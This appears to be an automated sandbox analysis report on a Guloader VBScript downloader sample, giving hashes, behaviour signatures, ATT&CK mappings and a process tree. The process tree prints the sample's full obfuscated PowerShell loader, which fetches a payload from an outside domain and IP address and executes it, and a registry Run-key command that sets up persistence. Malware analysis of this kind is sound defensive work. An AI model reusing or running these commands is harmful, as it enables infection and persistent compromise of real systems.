Overview

overview

10

Static

static

1

bcd66ce1c9...f1.vbs

windows7-x64

10

bcd66ce1c9...f1.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    03-07-2024 02:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1.vbs

  • Size

    26KB

  • MD5

    43fe0e9069047cb153a3e86508d5a6ca

  • SHA1

    bb5431130b0b3441b9eda1e54bad3f56eb49f04c

  • SHA256

    bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1

  • SHA512

    6816a9e7626d87afe7211780e6d3312e21400c165f4160149ad57bab61c504458fe133adf8d6467724fa2b148c2d762e4203b4b6d2e0630ad2f109c460827571

  • SSDEEP

    384:HlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww779O7LWJRMv:FzSR022X/523S0e8xPPmE9VIFj3W+N

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2508
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
        3⤵
          PID:2960
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
            4⤵
              PID:1880
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1684
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:552
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1860

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OJIJA08SZNMH583FIDK2.temp
        Filesize

        7KB

        MD5

        6078f6898b7f16fabccc0f4769dec9d9

        SHA1

        495565d9e0db7243913c184960275e562903d533

        SHA256

        940574c870c5c690009177619766c03df2d0e7b203ba510ec8ab6ba89dbdce9b

        SHA512

        dfea92140c0392a9996fa46e1264ecd6b5f2f54f30991446268ead56d9171b995771eb279488ae38341f4bdd4bb5ce4a5639ebc4b3ae55798a55a7649afe9596

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Scabrosely.Tor
        Filesize

        456KB

        MD5

        eb7223b18eb13fe6df85647ae9d12722

        SHA1

        a406984bd7e5ce4214402f0b8d8b4731976ee47a

        SHA256

        c3d1f59479601b37115c2c73552d208eda7f5de0817c57713025e20b2fbc1ef4

        SHA512

        ab23f8e3eadfd5e7e55aa614f63d40a91f51c7fe799516e986ce2aa269007085d873cd6ed730054e9ea1c395a2952ba9a340d85f816c1e97f8fe56da4571cc97

        Download Submit
      • memory/1684-41-0x00000000020E0000-0x00000000042D4000-memory.dmp
        Filesize

        34.0MB

        Download
      • memory/2456-38-0x00000000068B0000-0x0000000008AA4000-memory.dmp
        Filesize

        34.0MB

        Download
      • memory/2508-26-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-27-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-22-0x000000001B600000-0x000000001B8E2000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2508-28-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-30-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-31-0x000007FEF5C3E000-0x000007FEF5C3F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2508-32-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-21-0x000007FEF5C3E000-0x000007FEF5C3F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2508-23-0x0000000002240000-0x0000000002248000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2508-37-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-25-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-43-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2508-24-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
        Filesize

        9.6MB

        Download